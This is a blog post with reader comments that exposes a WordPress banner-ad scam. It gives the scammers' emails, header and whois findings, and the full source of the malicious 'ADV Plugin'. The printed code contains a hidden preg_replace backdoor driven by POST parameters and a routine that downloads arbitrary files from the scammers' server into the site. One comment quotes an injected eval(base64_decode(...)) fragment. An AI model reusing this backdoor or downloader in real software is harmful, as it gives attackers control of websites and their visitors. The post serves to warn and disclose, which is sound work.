Banner Ads Scam with ADV Plugin for WordPress
February 1st, 2012 by Michal Miksik Share |

lacoste banner ads scam A true story which might help someone out there
(I have replaced the real domain name with DOMAIN.COM):

Couple days ago I have received few emails written in not-that-good english from “Valentin Lopez representing the Gera Agency” (vlopez@geraagency.com), apparently a French marketing company based in Paris. You can find the complete text from the emails below in this article (apart from the domain name).


First Email
First email was pretty brief, I didn’t pay much attention to it but have replied asking for more information on this subject.

Strange was tho that someone is willing to buy banner ad space on a site which is under construction having only few pages with actual content and getting only small amount of traffic. (it is a WordPress site)

Subject: We would like to buy banner space on DOMAIN.COM.
 
Hi,
 
I am sorry I have to write you to e-mail from whois information of the domain. 
But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site DOMAIN.COM.
Is it possible to place banner on your site on a fee basis?
 
Best regards,
 
Valentin Lopez

Second Email
This was more interesting, the banners are supposed to be for a well known brand! Now mentioning also the company name (Gera Agency) and contact details including a fake-ish phone number.

Hello,
 
Thanks for reply to our proposal!
 
I represent Gera Agency. At the moment we are preparing an advertising campaign for Lacoste Company 
(it is a French company producing clothes, footwear, perfumery etc.) 
We already have designed banners for the campaign, they are the following sizes: 
160x600, 240x400, 300x250, 336x280, 468x60, 728x90.
What can be your price for one banner (banner should appear at ALL pages of your site) 
of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? 
Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
 
Best regards,
 
 
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

A quick look at the email headers gave more information:

Received: from colo-69-172-130-14.pilosoft.com (HELO nanaagency.com) (69.172.130.14)
          by colo-69-172-130-14.pilosoft.com with SMTP; 30 Jan 2012 ...
Message-ID: <something@nanaagency.com>

So we have also a Nana Agency going on and the site is the same (apart from the Agency name). I have googled both but did not find any further information about these fictional agencies.

The Gera Agency domain shows no PageRank or Alexa Rank, a search in archive.org reveals that the domain name was used previously by some travel agent, so it is probably a dropped domain name.

Whois search unfortunately doesn’t give much info apart from that the domain owner wishes to stay anonymous.
But it indicates that the domain was registered on the same day, possibly even after the First Email was sent.

Creation Date: 30-Jan-2012  
Expiration Date: 30-Jan-2013
 
Administrative Contact:
    PrivacyProtect.org
    Domain Admin        ()
    ID#10760, PO Box 16
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Nobby Beach
    null,QLD 4218
    AU
    Tel. +45.36946676

I have just replied that I would like to see the banners first and a third email came in.

Third Email
A brief one with link to a “little app” for managing banner ads. It did indeed show those animated gif banners prepared in different variations and sizes to choose from.

Hi!
Here you can see our banners: http://docs.geraagency.com/lacoste/?view=1
 
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

I have finally given some inadequate prices and a fourth email came in without any negotiations.

Fourth Email
To my surprise someone has taken the effort and setup my account in the banner ad manager with the correct sizes, domain name etc. From the control panel one can download a WordPress plugin for placing the banner ads called the “ADV Plugin”. There is also a help page with instructions.

Hi!
 
Thanks for reply to our proposal!
We like your price.
To pass to the banner control system follow the link http://webmaster.geraagency.com
To enter use the following data:
 
login: DOMAIN.COM
password: *********
 
 
You should install and activate the plugin in order to display advertisement. 
Before making payment, advertiser must approve location of the banner. 
The banner will be shown on your site when you add special code to your web- address 
(for example: http://DOMAIN.COM/?adv_test=1). 
It means, that visitors will see the banner only if it is approved and payment made.
 
To get installation instruction for your site type pass to: http://docs.geraagency.com/wp_install
To activate your site you have to enter the code: *********
 
What way of payment is suitable for you?
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

The plugin does create new directories and downloads stuff from the above mentioned domain/s, giving the faith of the site to the hands of the Gera (or any other name) Agency.

It does read settings from a "config" file where it can take multiple items from 
<banner_item>anything here even .mydodgyscript.php</banner_item>
and one match from 
<show_banner>anything here</show_banner>
and it displays only the item specified in <show_banner></show_banner>.

So in theory one can click Download Banners and it can download a somebanner.gif and somethingdodgy.php and show only the somebanner.gif, all looking fine, then use somethingdodgy.php to take control, upload, download, delete, modify…

What really happens with this plugin I don’t know as I have never installed it on my server, but it depends on the people in control of the config file…

You can find the plugin code as below.
The same concept is used on many domains and under different “Agency” names, I hope this helps someone …

  • Noah Vincent / Legretto Agency
  • Tristan Muller / Gana Agency
  • Valentin Lopez / Gera Agency
  • Matthieu Colin / NanaAgency
  • Oscar Meunier / Kervel Agency
  • Eliott Arnaud / Larko Agency
  • Lilian Marchand / Lemma Agency
  • Rayan Meyer / Bevesto Agency
  • and others …
 
/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */
 
class AdvWidget extends WP_Widget {
 
    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }
 
    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }
 
    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }
 
    function form($instance) {
 
    }
 
}
 
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
 
add_action('admin_menu', 'advPluginMenu');
 
register_activation_hook(__FILE__, 'advActivation');
 
define('ADV_SERVICE_DOMAIN', 'geraagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');
 
function advReadUrl($url) {
    if (function_exists('curl_init')) {        
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}
 
function advActivation() {
    update_option('adv_place', 'widget');
}
 
register_deactivation_hook(__FILE__, 'advDeactivation');
 
function advDeactivation() {
    delete_option('adv_key');
}
 
function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}
 
function adv_show_banner() {
    advShowBanner();
}
 
function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}
 
function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
    }
}
 
function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
    }
}
 
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
 
function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }
 
    $advPlace = get_option('adv_place');
    echo '<div class="wrap">';
 
    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}

Tags: , , ,

  • Zender

    Just received an inquiry from Valentin Lopez for the same banner space scheme. Looks like they’re still working this scam. Thank you for posting this so I can avoid wasting my time!

    • http://moonpixel.com Moonpixel

      Glad it was useful!

      • UNINCORPORATED

        I was about to download and install plug-in. Thank you Moonpixel

  • Kim

    Thank you for posting this. They sent me an email, too, and I was searching to see if they were legit when I found your post. I appreciate you taking the time to help the rest of us avoid this scam.

  • Katie

    Got an email from the same guy this morning! Thanks for posting this – so glad I decided to google the name / agency. 

  • http://twitter.com/LoriSoard Lori Soard

    Thanks for posting. The e-mail requesting that I install a plug-in sent up red flags for me, so I decided to Google the agency and came across your post.

  • Marco

    Hi, I also received this email few days ago, he says he’s from “gera agency” from Paris but he came across my website through pilosoft.com IP based in NY. But I don’t see your point, if they pay you where’s the problem? If they don’t pay you just erase the widget… or I do miss anything? 

    • http://moonpixel.com Moonpixel

      Hi Marco
      apart from that it’s all scam, if you install and activate the plugin on your site you will give someone access to your site, so someone will be able remotely upload stuff to your site – it could be malware or anything…
      Removing the plugin does not remove the stuff uploaded via the plugin…

  • Myfairies

    I accepted their offer back in november and the plugin stayed for nearly 3 days. What are the effects of it? What I should search for? I forgot about it, I just found some other sites talking about it and now I feel scared. I did not had any effects as long as I know. Could you please help me?

    • http://moonpixel.com Moonpixel

      This particular version (there could be other variation) does create in the root of your site a directory called “adv_banners” in that dir will be a set of other dirs with the campaign name and sizes probably, then inside those should be the stuff uploaded upon hitting the Download Banners link, so this is where to look in the first place.
      But ideally get your hosters to check all your files for malware.

      It does read settings from a “config” file where it can take multiple items from
      anything here even .mydodgyscript.php
      and one match from
      anything here
      and it displays only the item specified in .

      So in theory one can click Download Banners and it can download a somebanner.gif and somethingdodgy.php and show only the somebanner.gif, all looking fine, then use somethingdodgy.php to take control, upload, download, delete, modify…

      What really happens with this plugin I dont know as I have never installed it on my server, but it depends on the people in control of the config file…

  • Anders

    Hi, thanks for info. Valentin Lopez contacted me to. I installed the plugin and had it there for 1 hour, before I find your info on Internet. I have deleted the plugin but dont feel so safe. Is its possible for them to connect to other sites that I have..Or just that url where plugin where installed? I have send email to my host and let them take a look..But not sure that they will do that…Any advice? 

    • http://moonpixel.com Moonpixel

      Hi Anders, it’s hard to tell, if your other sites are in the same hosting account then possibly yes, if you have shell access you could do something like (if you’re on linux) find . -mmin -180 to find all files modified within last 3 hrs …

  • Jonathan Pochini

    Thanks a lot!
    Now they call themself Gana Agency and the contacts in the email looks like:
    Tristan Muller.
    site: http://www.ganaagency.com
    e-mail: tmuller@ganaagency.com
    phone: + (0)9 78 62 79 65

    • http://moonpixel.com Moonpixel

      Thanks Jonathan for the update!

  • Luca

    Got this email over the weekend, and stupidly installed the plugin yesterday. They were using the name Leggeto Agency. I have deleted the plugin and the directory it created called adv_banners. I scanned my FTP directory for other files to have been modified since I installed the plugin. There does not appear to be any more files modified from that time. Does this mean I have successfully eradicated the threat? Thanks for any help. I’ve contacted my hosting’s tech support with my issue, but they say it will take 2-4 hours to resolve, and I’ve taken matters into my own hand.

    • http://moonpixel.com Moonpixel

      Thx for the update, I think so, if it is the same version, no files modified and you removed it I think you’re fine. But definitely get your hosting company to check stuff…

    • http://thesmartphoneappreview.com Simon Burns

      Hi, please check your update.php and wp-settings.php, as this plugin added serious malware to mine

  • Jeff

    Noah,

    Just recieved this offer from Noah Vincent at the Legretto Agency (www.legretto.com), but the email exchange is the same.  I won’t be installing this junk, and thanks so much for alerting everyone to it!

  • Webmaster

    One more here… this is how the conversation goes:

    Hello,

    Thanks for reply to our proposal!

    I represent Rezatta
    Agency. At the moment we are preparing an advertising campaign for Lacoste
    Company (it is a French company producing clothes, footwear, perfumery etc.) We
    already have designed banners for the campaign, they are the following sizes:
    160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
    What can be your price
    for one banner (banner should appear at ALL pages of your site) of
    abovementioned sizes (please specify the place for the banner – top, bottom,
    left, right)? Please mention a normal link for banner, without javascript code
    and set prices in US dollars per month.

    Best regards,
    Samuel
    Blanchard.
    site: www. rezatta. com
    e-mail: sblanchard@rezatta.com
    phone: + (0)9
    78 62 65 38

    • http://bank-credits.com/ Credit Card Debt

      Hi!

      Unfortunately, the advertiser rejected your site. He has already gained the required number of advertising platforms for this season. Sorry for trouble you. You can remove plug-in.  As soon as our client resumes an advertising campaign we will contact you. Thank you and hope to cooperate with you in the future!
      Best regards,Samuel Blanchard.site: www.rezatta.come-mail: sblanchard@rezatta.comphone: + (0)9 78 62 65 38 

  • Webmaster

    …and then…
    Hi!

    Thanks for reply to our proposal!
    We like your price.
    To pass
    to the banner control system follow the link webmaster. rezatta. com
    To enter
    use the following data:

    login: www. yourwebsite. com
    password:
    6W8GG4Z

    You should install and activate the plugin in order to
    display advertisement. Before making payment, advertiser must approve location
    of the banner. The banner will be shown on your site when you add special code
    to your web- address (for example: http://www.yourwebsite.com/?adv_test=1).
    It means, that visitors will see the banner only if it is approved and payment
    made.

    To get installation instruction for your site type pass to: http://docs. rezatta. com/wp_install
    To
    activate your site you have to enter the code: 5V7-MXK-SUU

    What way
    of payment is suitable for you?

    Best regards,
    Samuel
    Blanchard.
    site: www. rezatta. com
    e-mail: sblanchard@rezatta.com
    phone: + (0)9
    78 62 65 38

  • http://thesmartphoneappreview.com Simon Burns

    Hi,

    This adv thing adds malware to .php files.

    I would recommend everyone scan their site after removing this plugin. My wp-settings.php and my update.php files had malware added to them in the form of: 

    // Start cache settings
    eval(base64_decode(‘Cg0KCmRl

    This is very very serious.

    The whole cache settings part should be removed, along with the lines of gobbledegook. Go through your site with an FTP fine comb and remove anything to do with the ad plugin, I found it in three places.

    Just because you have uninstalled the plugin doesnt mean the malware has gone!!!!

    Avoid these guys like the plague!

    • http://moonpixel.com Moonpixel

      Thanks for the heads-up Simon!

    • Info

      Hi, Scan your site? How can i do that? Any plugin? I tell My hosting company to check but they just give me à long list of things that i can do..I thought that the hosting company can help whit things like this.

      So if any one have à good plugin or software to recomend, so i can Scan My sites, i will be happy.

      Thanks!

      I removed the plugin after some mins, but when delete the plugin from the server, the catalog is still there?

      • http://moonpixel.com Moonpixel

        There are different WP plugins you could use, for example Antivirus – this scans only the theme files I think, if you want more in depth scan you could use http://www.websitedefender.com/

        If you have shell access you could use:

        find . -mmin -180

        to find all files modified within last 3 hrs

        find . -name *.php | xargs grep ‘base64_decode’

        to find all files with extension .php which contain base64_decode

        NOTE: all these methods mentioned above can/will find also other files which might not be “harmful”,  so best to get your hosting company to help you

  • Sue

    OMG I almost uploaded the plugin..got this inkling to just google ‘adv plugin’ seconds before I click upload. Thank you for posting this n taking the time to warn the rest of us.

    Btw they used this address too..

    Ilyes Leclerc.
    site: www. melnel .com
    e-mail: ileclerc@melnel.com
    phone: + (0)9 78 62 95 19

  • http://twitter.com/jack_on_a_plane Jack P

    I just got this email today, from a Thibault Lucas from nettero. com. I became suspicious

  • http://twitter.com/jack_on_a_plane Jack P

    I received this email today and unfortunately got as far as installing the plugin. The email came from a
    Thibault Lucas with an @nettero.com email address. I became suspicious when looking at the whois for nettero .com and seeing it was registered yesterday. I’m now in the process of checking each file for base_decode.

    • http://moonpixel.com Moonpixel

      thx for the update Jack

  • Neil

    I thought I smelled a scam.  Thanks for confirming!  Got the first email today from a Jules Rolland, @ marreto .com.

    • Chris

      I got the same one from Jules just a week ago

  • Kim Prince

    just happened to me.  SO glad I googled it and found this post.  THank you.

  • http://sunshineandsippycups.com/ Meagan Paullin

    I just went through a MAJOR crisis due to this plugin!!!

    It’s been on my site for over 8 months – I fell for this scam when I was a new blogger. Installed it, then was so overwhelmed and busy as the site grew really quickly, and just forgot all about it. It was the first plugin on the page, right above Akismet, and I honestly kept thinking that it was something similar to that, something to keep the site safe, and never paid much attention to it. No idea how I forgot what it was all about – I would have deleted it MONTHS ago!

    Well, suddenly I get an email from Google telling me that I have malware on my site, and my site is then blocked with that big red warning page. EEK! I spent days trying to find the problem – we’d delete the malicious code and it would come right back. It was causing huge nasty porn pop ups everywhere.

    But, after deleting this plugin, and clearing the files again – It looks like it’s finally safe again!!!! Woo Hoo! But I now have to wait until the Google Gods decide to clear my site again, and allow that big message to be removed. I’ve lost almost 3 days of traffic now, and it’s killing me.

    Thank you SO much for this post – this is how we figured out the problem!!

  • Campingmemories

    I too received this a few weeks ago………..totally a scam…………

    Hello,

    Thanks for reply to our proposal!

    I represent Marreto Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
    What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.

    Best regards,
    Jules Rolland.
    site: www. marreto. com
    e-mail: jrolland@marreto. com
    phone: + (0)9 78 62 26 11

  • Realttorney

    I got a message from Jules Rolland yesterday. Thanks for this post. It was very helpful.

  • Yas Ayub

    Good Scam, I got an email from Marretoo Agency, glad I googled it before installing thankyou for the post.. thankyou

  • Jerminix

    Got also an email from Marreto days ago.. thanks for the information.

  • Search Moonpixel

  • Blog Categories

  • Ads
    LoungePad
  • AdSense
  • Chitika
  • Subscribe for Updates

  • Moonpixel on Facebook

  • @moonpixel on Twitter